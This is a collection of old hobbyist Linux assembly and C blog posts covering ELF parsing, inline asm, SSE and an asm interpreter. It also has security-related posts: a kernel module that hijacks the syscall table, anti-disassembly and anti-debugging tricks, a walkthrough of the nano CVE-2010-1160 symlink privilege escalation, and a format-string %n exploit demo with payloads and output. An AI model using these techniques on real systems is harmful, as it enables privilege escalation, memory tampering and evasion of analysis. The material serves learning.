Search results for 'int80h'
Every ELF (Executable Linux Format) file has standard structure.
There is section names that used to identify purpose of section.
Here is example how to write all names of all ELF sections.
Here is steps that we have taken:
1. Find String Table Section
2. Get all section names from string table section
3. Run trough all section an get names of sections
First of all we need get ELF header (Elf32_Ehdr) from position 0.
ELF header have offset of section headers (Elf32_Ehdr.e_shoff).
Sting table section have attributes with help us to recognize it:
1. string table section header address in memory (Elf32_Shdr.sh_addr) is 0
2. its type (Elf32_Shdr.sh_type) is SHT_STRTAB = 3
3. and it is first section with such attributes
To get trough all sections we make for cycle. We can get number
of sections from (Elf32_Ehdr.e_shnum) .
we run all trough all sections and checking for 3 string table section
rules.
for ( iter_s=0; iter_s < ELFheader.e_shnum; iter_s++ )
{
fseek( f, ELFheader.e_shoff+(ELFheader.e_shentsize*iter_s), SEEK_SET);
fread( &STRheader, ELFheader.e_shentsize, 1, f );
if ((STRheader.sh_type == SHT_STRTAB) &&
(STRheader.sh_addr == 0x00000000))
{
//some code
iter_s=ELFheader.e_shnum+1; //this is to exit from for cycle
}
}
String table section has all section names as strings. Section name
is in (Elf32_Shdr.sh_name) as position number of strings first symbol.
All string table values we read inside buffer
fseek( f, STRheader.sh_offset, SEEK_SET);
fread( STR_buffer, STRheader.sh_size, 1, f);
Now we can get section name with
printf("%s\n", STR_buffer+ITERheader.sh_name);
This is example code to get some info from ELF file. There is allot other
info that can be gained from ELF file.
There is long time since wanted to learn "creepy" gcc inline assembly.
Looking at manuals its not so hard and "creepy". Using it is more
interesting and dissambly of compiled code is very nice looking.
volatile puts our asm code where it is and don't optimize it without
volatile it can optimize.
What to write in __asm__ directive looks like this
__asm__ __volatile__("our_code":output:input:used)
as code to convert to inline asm we will use last post [2].
There is only one instruction that we using and it usage was
get_timer:
rdtsc
ret
its not very optimal and for 1 instruction writing whole function
its not beautiful. We remember that returning result of this function is
saved in eax register.
__asm__ __volatile__("rdtsc":"=a"(x)::)
code looks like this. But we can make it as define function
#define get_timer(X) __asm__ __volatile__("rdtsc":"=a"(X)::)
This code works fine and give 70058 ticks on cycle
When adding option -O2 then result becomes wherry strange.
As we remember that rdtsc return result in edx:eax then we add to
used registers(clobber) %edx.
#define get_timer(X) __asm__ __volatile__("rdtsc":"=a"(X)::"%edx")
And also we can rewrite everything as
inline function.
static inline unsigned int get_timeri()
{
unsigned int i;
__asm__ __volatile__("rdtsc":"=a"(i)::);
return i;
}
Now this two functions works fine with -O options.
When empty cycle is optimized then it becomes empty and resulting
tick number is 32 for both inline function and define macro.
It not working for his main purpose. When no optimization switched
then get_timer works for some ticks faster then get_timeri.
We can add attribute always inline and we will win some ticks
and function will always inline regards optimization level
__attribute__((always_inline)) unsigned int get_timeri()
Too fix test cycle for our measurement we make it as object file
and it will compiled without options.
void fixed_cycle()
{
int i;
for (i=0;i<10000;i++)
{
}
}
Now everything looks quite good and also inline assembly works as expected.
For reference about inline asm you can go to [1]
Source
Links
[1]http://www.ibiblio.org/gferg/ldp/GCC-Inline-Assembly-HOWTO.html
[2]http://main.lv/post/linux-antidebug-5
Hook interrupt descriptor table
Hooking interrupt table is very interesting thing
with it you can dissallow some operations to be made or watch what
happening in system. This article is more like review and more tehnical
description is in link 1
First thing that we should know that it will done trought kernel module
there is 2 commands for loading and unloading modules
insmod
and
rmmod
there is way how we can check system call addresses and position of syscall
table
grep sys_call_table /proc/kallsyms
grep system_call /proc/kallsyms
also we can use it for detecting our module functions and syscall addreses
grep sys_write /proc/kallsyms
or if we whant check out module functions
grep hook_idt /proc/kallsyms
We will now try to hook sys_mkdir. I usualy using some minimalistic
windowmanagers but some browsers or other GUIsh programs like such directories
"Download" or "Desktop" all my directories in ~/ is lowercase and I realy hate
anoying "Download" and "Desktop" directories that are made without my permission
and for my lowercase /home directory style is agly. With this hook they will
be denied to make such thing.
Out kernel module consist of such functions:
static int __init hook_init(void) //stufff on module init,idt hooking
static void __exit hook_exit(void) //stuff on module exit, restore idt table
asmlinkage long hooked_mkdir(const char *filename, mode_t mode) //our hook function
//how works this functions you can find in link number 1
void *get_writable_sct(void *sct_addr)
void *get_syscall_table(void)
Basic hooked function is:
asmlinkage long hooked_mkdir(const char *filename, mode_t mode)
{
return mkdir(filename, mode);
}
but now we need to add check for ("Desktop","Download"). First we need some error
that will returned when some one whant to make bad directory
we will use EACCES error.
here is modified functions for out task:
//hook mkfile command
asmlinkage long hooked_mkdir(const char *filename, mode_t mode)
{
//it will disallow all files that starts with Desktop&&Download
if (((strncmp(filename,"Desktop",7) == 0) && (strlen(filename) == 7)) ||
((strncmp(filename,"Download",8) == 0) && (strlen(filename) == 8)))
{
printk(KERN_INFO "Mkdir hook\n");
return EACCES;
}
return real_mkdir(filename, mode);
}
For module compiling:
make
This is tested with kernel version 2.6.38
Links:
[1] http://codenull.net/articles/kmh_en.html
[2] http://www.gadgetweb.de/linux/40-how-to-hijacking-the-syscall-table-on-latest-26x-kernel-systems.html
SSe programming is whery interesting fromthat point that there are parallely 4 numbers that are porcessed.SSE has registers of size 128 bits. They can handle 4 floats.GCC C there is no default type for 128 bits and we define our ownstructure for that.
typedef struct xmm
{
float a;
float b;
float c;
float d;
} xmm __attribute__ ((aligned (16)));structure is aligned for perfomance.to make 4byted value + 4byte valuewe need to load values:movaps xmm0, [eax]
movaps xmm1, [ebx]
and add themaddps xmm0,xmm1
after that store somewhere movaps [eax], xmm0
Final test program in C looks like:typedef struct xmm
{
float a;
float b;
float c;
float d;
} xmm __attribute__ ((aligned (16)));
extern void sse_add( xmm *, xmm * );
int main( int argc, char **argv)
{
xmm x0,x1;
x0.a = 1.0;
x0.b = 2.0;
x0.c = 3.0;
x0.d = 4.0;
x1.a = x1.b = x1.c = x1.d = 5.0;
printf("%10f %10f %10f %10f\n",x0.a,x0.b,x0.c,x0.d);
printf("%10f %10f %10f %10f\n",x1.a,x1.b,x1.c,x1.d);
sse_add( &x0 , &x1 );
printf("%10f %10f %10f %10f\n",x0.a,x0.b,x0.c,x0.d);
printf("%10f %10f %10f %10f\n",x1.a,x1.b,x1.c,x1.d);
return 0;
}gcc main.c add.o -o main And asm exampleformat ELF
section '.text'
public sse_add
align 4
sse_add:
;arguments that are pointers for 2 xmm data blocks
x0 equ [ebp+8]
x1 equ [ebp+12]
push ebp
mov ebp, esp
mov eax, x0
mov ebx, x1
;load in xmm0 and xmm1 values
;if values where not aligned than we would used other instruction
movaps xmm0, [eax]
movaps xmm1, [ebx]
;sum up and save inside xmm0
addps xmm0,xmm1
;save value in first argument
movaps [eax], xmm0
pop ebp
retfasm add.asm add.o
This is small interpretr in asm.
It works with small language thats can make simple things
All that you need to know about language
is this symbols "ABCDI$@"
ABCD is used with parametr.
I without param
$@ is params
ABCD - is like assembler command mov where symbol is register name
A0 is mov eax, 0
B9 is mov ebx, 9
only one number is supported. Number range after ABCD suposed to be 0...9.
But you can add any other symbol only not @ or $. Look inside ascii table
char '0' is 0 and other goes relativly from it. number '~' is '~'-'0'=127-48=79
I - is interupt number 80h
$@ - is variables from stack
@ - uses current varaible from stack and stack pointer goes to next stack value
$ - uses current stack value and dont change stack pointer position
Thats all.
Now we can make our first script and run it.
There is 2 thing that you should know.
Script is converted to assembler commands and copyed in memory position.
Every file has hiw own purpose and all they seperated for easy to use
'script.inc' you scipt inside it
'stack_table.inc' configure stack for use
'variables.inc' define variables
'exec.inc' memory region wher script interpreted commands will copyed
Example 1:
Now first example script:
script db 'A1B0I'
mov eax, 1 ;you can look this variable inside
#include < asm/unistd.h>
or in http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html
mov ebx, 0
int 80h
it is command exit. stack can be empty.
Example2:
Now we can make hello_world.
script db 'A4B1C@D@IA1B0I'
It is
mov eax, 4
mov ebx, 1
mov ecx, buffer_msg; stack value 0
mov edx, buffer_len; stack value 1
int 80h
mov eax, 1
mov ebx, 0
int 80
in C it would be
write(1,buffer_msg,buffer_len)
exit(0);
Here is example how corresponds asm to C code http://www.main.lv/posts/view/linux-assembler-open-file.
Ther is used stack in 'stack_table.inc':
stack_table:
dd buffer_msg ;variable 0
dd buffer_len ;variable 1
and in 'variables.inc' we define this variables:
buffer_msg db "Hello world",10 ;with newline
buffer_len = $-buffer_msg ;using fasm mega feature to detect size
we can count equvialent asm commands and there is 8 of them
it means add 8 lines in 'exec.inc'
db 0x90,0x90,0x90,0x90,0x90
db 0x90,0x90,0x90,0x90,0x90
db 0x90,0x90,0x90,0x90,0x90
db 0x90,0x90,0x90,0x90,0x90
db 0x90,0x90,0x90,0x90,0x90
db 0x90,0x90,0x90,0x90,0x90
db 0x90,0x90,0x90,0x90,0x90
db 0x90,0x90,0x90,0x90,0x90
type make and everything works =]. WooHoo small interpretd language is made and it fits in 417 bytes.
Main idea was to replace compiled in function with some other code and run it.In default it is not possible. If you try to write some bytes withmemcpy() in function location then segfault happens. Why? Programm has different segments and they used for different program purpose.Our code belongs to readonly-executable segment. And '.text' section We can se it with
readelf -S main -l
in previos post there was program that can be used to make segment writable.After running
./textwriteble main
now segment with '.text' section becomes writable. When we try use memcpy() there is no segfault now.Second thing is how to make our function that will replace compiled in functionposition independent for some data inside function? First of all we should know our current position.It is in eip register. push eip? mov eax, eip? it doesnt work. When we use call in stack is saved return address. Now with this small functionit can be saved in some location
get_ip:
mov ecx, [esp]
retAt this moment we have converted segment to writable.Have writen position detection function. If there would be data that will used in replaced function than need detectposition of that data. For example we will usemov eax, sys_call ;we will use SYS_WRITE = 5
mov ebx, output_id ; output on terminal is STDOUT 1
mov ecx, pointer_to_msg
mov edx, size_of_msg
int 80h
if this was ordinary situation then define:msg db "Hello",10
msg_size = $-msg
and our code becomesmov eax, SYS_WRITE
mov ebx, STDOUT
mov ecx, msg
mov edx, msg_size
int 80h
but how to know position of msg if you dont know position where function will placed?Use function get_it and you will know current instruction position. And it will next instructionaftercall get_ip
Our code becomescall get_ip ;calling and detecting eip
saved_ip: ;position that will be saved
jmp get_ip_end ;jump over function
get_ip:
mov ecx, [esp] ;save return eip
ret
get_ip_end:
mov eax, SYS_WRITE
mov ebx, STDOUT
add ecx, msg-saved_ip ;offset of msg
mov edx, msg_size
int 80hECX has position independent pointer to our text.For testing purposes function fun() is filled withasm(".byte 0x90, ... ,0x90");hex 0x90 translates in nop instruction.nop is No OPeration instruction.And function does nothing.Function fun() containspush ebp
mov ebp, esp
start_overwrite_here:
nop
...
...
...
nop
pop ebp
ret
Nop instructions can be replaced with any binary code.There should be enought nop instructions for our binary code.There is no check on function size that way when overwriting can be problemsif binary code size is larger then function size.Start function overwriting at position (&fun+3) witn memcpy()push ebp
mov ebp, esp
start_overwrite_here:
nop
...
...
...
nop
pop ebp
ret
Wuala function after enabling segment can be overwriten. Here is used previous expirienceand we have mega trick with function replacment.
Compile:
make
Source
Linkage:
[1] http://www.unixwiz.net/techtips/win32-callconv-asm.html
[2] http://www.programmersheaven.com/mb/x86_asm/357735/357735/get-the-value-of-eip/
[3] http://toku.es/2010/06/text-writable/
[4] http://main.lv/posts/view/elf-text-section
[5] http://main.lv/posts/view/linux-assembler-hello-world
CVE-2010-1160 Nano Changed File Symlink Privilege EscalationUsualy if I have to edit some file I am using nano editor. It is almost on every distribution and easy and fast to use. Some time ago i hated vim beacouse of Ctrl-D =] and that way used nano or pico. Now I know how to exit from vim :q!. After this bugreported in CVE i was exited to check it out in real life. It is first bug that i have fully tested.This bug is fixed in newest versions. Testing all nano version this bug works on < 2.1.7 versions now on my system is latest nano version and I have compiled many < 2.1.7 versions to test this bug. To get your nano version run:$ nano -VWhen user is editing file nano don't check if it is edited by some one else. When saving file it simply save it and dont check if it was modified. If file was changed by some one else then nano will overwrite it with his text. But it can be changed to symlink that points to other file. How to use it in real life:
1) Open file with nano
2) Change file or set symlink
3) Make changes in file and save file in nano
4) See result in symlinked file
Everytning looks like$nano text.txtNow some one do:$ls -s empty.txt text.txtNano savewhach you save in text.txtIn python it looks like:
os.remove( "text.txt" )
open( "empty.txt" , "w" ).close()
os.symlink( "empty.txt" , "text.txt"
Python step by step
If you are root and opening file with owner isnt you. Than owner while you editing his file can setsymlink to some "/etc/important.conf" and you will overwrite it with some other unrelated info. This can make some harm to your system.How can it be exploited in real life by "small unpreviliged user". Make some interesting file that root will interested in. Make some process that whachs nanos running in system.
If nano opened file is our , symlink it.
1)Detect running nano in system
2)Check with file is opened
3)If file is yours make symlink
Nano catch
Script is only for user and dont work if you try to symlink root opened nano. It makesall steps as described above. Change script variables for your tests:
debug = True
nano = "nano-2.0.9"
user = "user"
sym_path="/home/user/empty.txt"
Tested only with python 2.6.5
Simply be uptodated or if you using old nano dont open with privileged user unpriveleged user files. It will save you from this bug.
Linkage:
[1] http://osvdb.org/show/osvdb/63872
[2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-1160
[3] http://drosenbe.blogspot.com/2010/03/nano-as-root.html
[4] http://svn.savannah.gnu.org/viewvc/trunk/nano/ChangeLog?revision=4503&root=nano&view=markup
Now we will try to make disasm output whery unclear. We make jump with eax register
Programm 1
main:
push lbl+1
pop eax
jmp eax
lbl:
db 0xe8
mov eax, 4
mov ebx, 1
mov ecx, msg1
mov edx, msg1_size
int 80h
mov eax, 1
mov ebx, 0
int 80h
Output is same as source. Nothing changes
Dissassembler output 1
? ....... ! main: ;xref o80482d7
? ....... ! push offset_804837d
? 8048379 ! pop eax
? 804837a ! jmp eax
? 804837c db 0e8h
? 804837d !
? ....... ! offset_804837d: ;xref o8048374
? ....... ! mov eax, 4
? 8048382 ! mov ebx, 1
? 8048387 ! mov ecx, strz_I_am_running__8049568
? 804838c ! mov edx, 0eh
? 8048391 ! int 80h
? 8048393 ! mov eax, 1
? 8048398 ! mov ebx, 0
? 804839d ! int 80h
Here we add only one instruction. We get jump adress and add 1. Disasm cannot calculate adress of jmp.
Programm 2
Like in first programm disasm think that we push correct adress and disasm it. And our byte 0xe9 is used for disasm output. That nice.main:
push lbl
pop eax
inc eax
jmp eax
lbl:
db 0xe9
mov eax, 4
mov ebx, 1
mov ecx, msg1
mov edx, msg1_size
int 80h
mov eax, 1
mov ebx, 0
int 80h
Dissassembler output 2
? ....... ! main: ;xref o80482d7
? ....... ! push offset_804837d
? 8048379 ! pop eax
? 804837a ! inc eax
? 804837b ! jmp eax
? 804837d !
? ....... ! offset_804837d: ;xref o8048374
? ....... ! jmp 804883ah
? 8048382 add [ebx+1], bh
? 8048388 mov ecx, 8049568h
? 804838d mov edx, 0eh
? 8048392 int 80h
? 8048394 mov eax, 1
? 8048399 mov ebx, 0
? 804839e int 80h
Now we add nop instruction after every line of our code. It doesnt have any imapct on programm work.
Programm 3
main:
push lbl
pop eax
inc eax
jmp eax
lbl:
db 0xe9
mov eax, 4
nop
mov ebx, 1
nop
mov ecx, msg1
nop
mov edx, msg1_size
int 80h
mov eax, 1
mov ebx, 0
jmp lbl2+1
lbl2:
db 0xe9
int 80h
Disasm output now is very nice. Output isnt very good. For first time when you view this output it is very unclearabout what exactly is done by this code.
Dissassembler output 3
? ....... ! main: ;xref o80482d7
? ....... ! push offset_804837d
? 8048379 ! pop eax
? 804837a ! inc eax
? 804837b ! jmp eax
? 804837d !
? ....... ! offset_804837d: ;xref o8048374
? ....... ! jmp 804883ah
? 8048382 add [eax+1bbh], dl
? 8048388 add [eax+49578b9h], dl
? 804838e or [eax+0ebah], dl
? 8048394 add ch, cl
? 8048396 cmp byte ptr [eax+1], 0bbh
? 804839d add [eax], al
? 804839f add [eax], al
? 80483a1 jmp 80483a4h
? 80483a3 jmp 98950475h
Here is one more way how to make unclear jumo to other place. We using functionand inside function we change return adress by 1.
Programm 4
Thats also works fine. Disasm dont know real return adress ans and use 0xe8 as he think is better.
main:
call fun
db 0xe8
mov eax, 4
mov ebx, 1
mov ecx, msg1
mov edx, msg1_size
int 80h
mov eax, 1
mov ebx, 0
int 80h
fun:
pop ebp
inc ebp
push ebp
ret
Dissassembler output 4
? ....... ! main: ;xref o80482d7
? ....... ! call sub_804839c
? 8048379 ! call 8048836h
? 804837e ! add [ebx+1], bh
? 8048384 ! mov ecx, strz_I_am_running__8049568
? 8048389 ! mov edx, 0eh
? 804838e ! int 80h
? 8048390 ! mov eax, 1
? 8048395 ! mov ebx, 0
? 804839a ! int 80h
? 804839c !
? ....... ! ;-----------------------
? ....... ! ; S U B R O U T I N E
? ....... ! ;-----------------------
? ....... ! sub_804839c: ;xref c8048374
? ....... ! pop ebp
? 804839d ! inc ebp
? 804839e ! push ebp
? 804839f ! ret
Source
This is dirty solution it checks programms argv[0] name with your defined namewhen running debuger such as gdb or ald name is chaned to fullpath nameuser defined name from terminal is './main'.
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
int main( int argc , char **argv )
{
pid_t pid,ppid;
FILE *f;
char str[128];
char spid[10];
//openfile and write ppid
f = fopen( "pid.txt" , "w" );
pid = getpid();
fprintf(f,"%d ",pid);
fclose( f );
f = fopen( "pid.txt" , "r" );
fscanf( f , "%s" , spid );
fclose( f );
strcpy( str , "cat /proc/" );
strcat( str , &spid[0] );
strcat( str , "/cmdline");
printf( "[%s]\n", spid );
system( str );
printf("\n");
}Dirty function that makes dirty solution at one placeint badppid( const char *real_name )
{
pid_t pid,ppid;
FILE *f;
char str[128];
char spid[10];
f = fopen( "pid.txt" , "w" );
pid = getpid();
fprintf(f,"%d ",pid);
fclose( f );
f = fopen( "pid.txt" , "r" );
fscanf( f , "%s" , spid );
fclose( f );
strcpy( str , "cat /proc/" );
strcat( str , &spid[0] );
strcat( str , "/cmdline > name.txt");
system( str );
f = fopen( "name.txt" , "r" );
fscanf( f , "%s" , str );
fclose( f );
if ( strncmp(str,real_name,strlen(real_name)) != 0 )
{
return -1;
}
return 0;
}Source
When ptrace is used for programm debugin then only one ptrace can be attached to programmwhen we trying run ptrace with PTRACE_TRACEME then we get -1. I tested with gdb,ald. Also this method shouldwork with IDApro
#include <stdlib.h>
#include <stdio.h>
#include <sys/ptrace.h>
long int ptraced()
{
return (ptrace(PTRACE_TRACEME, 0, 0, 0) == -1);
}
int main()
{
if ( ptraced() )
{
printf("Ptraced!\n");
}
return 0;
}
Source
If 0x80**** adreeses is default nope. You can setup your own. Compiler will not see thembut you can do it. Setup LDT and you will see it.
use32
mov dword [0] ,"Hall"
mov dword [4] ,"Ball"
mov dword [8] ,"Mall"
mov dword [12],0x00000000
yes everything starts from 0x0#include <stdlib.h>
#include <stdio.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <asm/ldt.h>
char new_segment[16];
int main()
{
int r;
struct user_desc *ldt;
ldt = (struct user_desc*)malloc(sizeof(struct user_desc));
ldt->entry_number = 0;
ldt->base_addr = ((unsigned long)&new_segment);
ldt->limit = 16;
ldt->seg_32bit = 0x1;
ldt->contents = 0x0;
ldt->read_exec_only = 0x0;
ldt->limit_in_pages = 0x0;
ldt->seg_not_present = 0x0;
ldt->useable = 0x1;
printf("Start\n");
r = syscall( __NR_modify_ldt, 1 , ldt , sizeof(struct user_desc) );
if ( r == -1 )
{
printf("Sorry\n");
exit( 0 );
}
asm("pushl %ds");
asm("movl $0x7, %eax"); /* 0111: 0-Index 1-Using the LDT table 11-RPL of 3 */
asm("movl %eax, %ds");
asm(".byte 0xc7,0x5,0x0,0x0,0x0,0x0,0x48,0x61,0x6c,0x6c,0xc7,0x5,0x4,0x0,0x0,0x0,0x42,0x61,0x6c,0x6c,0xc7,0x5,0x8,0x0,0x0,0x0,0x4d,0x61,0x6c,0x6c,0xc7,0x5,0xc,0x0,0x0,0x0,0x0,0x0,0x0,0x0");
asm("popl %ds");
printf("End\n");
printf("Segment [%s]\n",new_segment);
free( ldt );
return 0;
}
asm(".byte ... ") is code.bin
Compile:
fasm code.asm code.bin
gcc main.c -o main
Source
format ELF
section '.text' executable
public eexit
eexit:
mov eax,1
xor ebx,ebx
int 0x80
ret
#include <cstdlib>
#include <cstdio>
#include <iostream>
extern "C" void eexit();
int main()
{
eexit();
std::cout << "Problem?\n";
return 0;
}
Compile:
fasm hello.asm hello.o
g++ -c cmain.cpp -o cmain.o
g++ cmain.o hello.o -o cmain
format ELF
section '.text' executable
public eexit
eexit:
mov eax,1
xor ebx,ebx
int 0x80
ret
#include <stdlib.h>
#include <stdio.h>
extern void eexit();
int main()
{
eexit();
printf("Problem?\n");
return 0;
}
Compile:
fasm eexit.asm eexit.ogcc -c main.c
gcc main.o eexit.o -o main
format ELF executable
segment readable executable
start:
mov eax, 4
mov ebx, 1
mov ecx, hello_msg
mov edx, hello_size
int 80h
mov eax, 1
mov ebx, 0
int 80h
segment readable writeable
hello_msg db "Hello World!",10,0
hello_size = $-hello_msg
Compile:
fasm hello.asm hello
Format string attack is attack for C formated strings. Format string function is prinrf() there are other functions that support format string.C code for bad used printf():
int main( int argc, char **argv )
{
static int i = 0;
char text[1000];
strcpy(text, argv[1]);
printf("%.8x\n",&i);
printf("No way it never will works because value of i=%d\n",i);
printf( text );
printf("\nValue of i=%d\n",i);
return 0;
} First output is adress of static iThan we outputing values of i and call printf() with first argument fo prgramm.and then watching value if i
Run:
./e1 'Halolo'
Output:
08049674
No way it never will works because value of i=0
Halolo
Value of i=0
Run:
./e1 'Halolo%s'
Output:
08049674
No way it never will works because value of i=0Halolo(null)
Value of i=0
Run:
./e1 $'\x74\x96\x04\x08_%x'
Output:
08049674
No way it never will works because value of i=0
t?_0
Value of i=0
Read about %n in format string:
Run:
./e1 $'\x74\x96\x04\x08_%x_%n'
Output:08049674
No way it never will works because value of i=0
Segmentation fault
Run:
./e1 $'\x74\x96\x04\x08_%x_%x_%x_%x_%x_%n'
Output:
08049674
No way it never will works because value of i=0
t?_0_8_40_4_4_
Value of i=16
Run:
./e1 $'\x74\x96\x04\x08_%x_%x_%x_%x_%.1201x_%n'
Output:
08049674
No way it never will works because value of i=0
t?_0_8_40_4_000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000004_
Value of i=1216
Now you can input almost any value to i
PC speaker can make sound you whant. Here is small PC speaker player. Set notes , set time
delay and you on. You shold run this code under root if nothing happends.
int main()
{
int rc,i;
note *curent_song;
curent_song = song;
struct timespec t1;
rc = syscall(SYS_open,"/dev/console",O_WRONLY,7*8*64+7*8+7); //open cosole
if (rc == 0)
rc = 1;
ioctl( rc, KIOCSOUND , 0 );
ioctl( rc , KDSETLED , 7 );
i = 0;
while ( curent_song[i].n != 0 )
{
ioctl( rc , KIOCSOUND , curent_song[i].n );
msleep( (curent_song[i].t) );
ioctl( rc , KDSETLED , i&0x0007 );
i++;
}
ioctl( rc , KDSETLED , 0 );
ioctl( rc, KIOCSOUND , 0 );
return 0;
}
Send some bytes and flash LED on you keyboards.Run it under root. There will no be any errors if something happens.
Usage:
./kbled [NumLock] [CapsLock] [ScrLock]
./kbled 0 0 0
#include <stdlib.h>
#include <fcntl.h>
#include <sys/syscall.h>
#include <linux/kd.h>
int main( int argc , char **argv )
{
int rc,i;
if (argc != 4) exit(0);
rc = syscall(SYS_open,"/dev/console",O_WRONLY,7*64+7*8+7); //open cosole
if (rc == 0) rc = 1;
i = (argv[1][0]-'0')*2+(argv[2][0]-'0')*4+(argv[3][0]-'0');
ioctl( rc , KDSETLED , i );
return 0;
}
Source
Research in ARP protocol. Watch ARP packets , count them and show in list.
Usage:
./arpsni eth0
Version 0.1
[2009nov30]
ArpSni.0.1
First shell code writened from example. Shell code is very interesting way how to execute some code.asm source:
use32
xor eax, eax
inc eax
xor ebx, ebx
int 80h
fasm code.asm code.bin
bin2hex output:
\x31\xc0\x40\x31\xdb\xcd\x80
C source:
#include <stdio.h>
char code[] = "\x31\xc0\x40\x31\xdb\xcd\x80";
int main()
{
void (*ret)();
ret = (void (*)())code;
ret();
printf("Nope it not working\n");
}
gcc main.c -o main
run
./main
nothing happens. That exactly that code do exits from programm Source
My variant of Bin2Hex
Code for creating file:
format ELF executable
include 'cdecl.inc'
include 'syscall.inc'
mode_t equ dd
segment readable executable
start:
mov eax, SYS_MKDIR
mov ebx, path
mov ecx, [mode]
int 80h
mov eax, SYS_EXIT
xor ebx, ebx
int 80h
segment readable writeable
path db "dir",0
mode mode_t 0777o
fasm makedir.asm -o makedir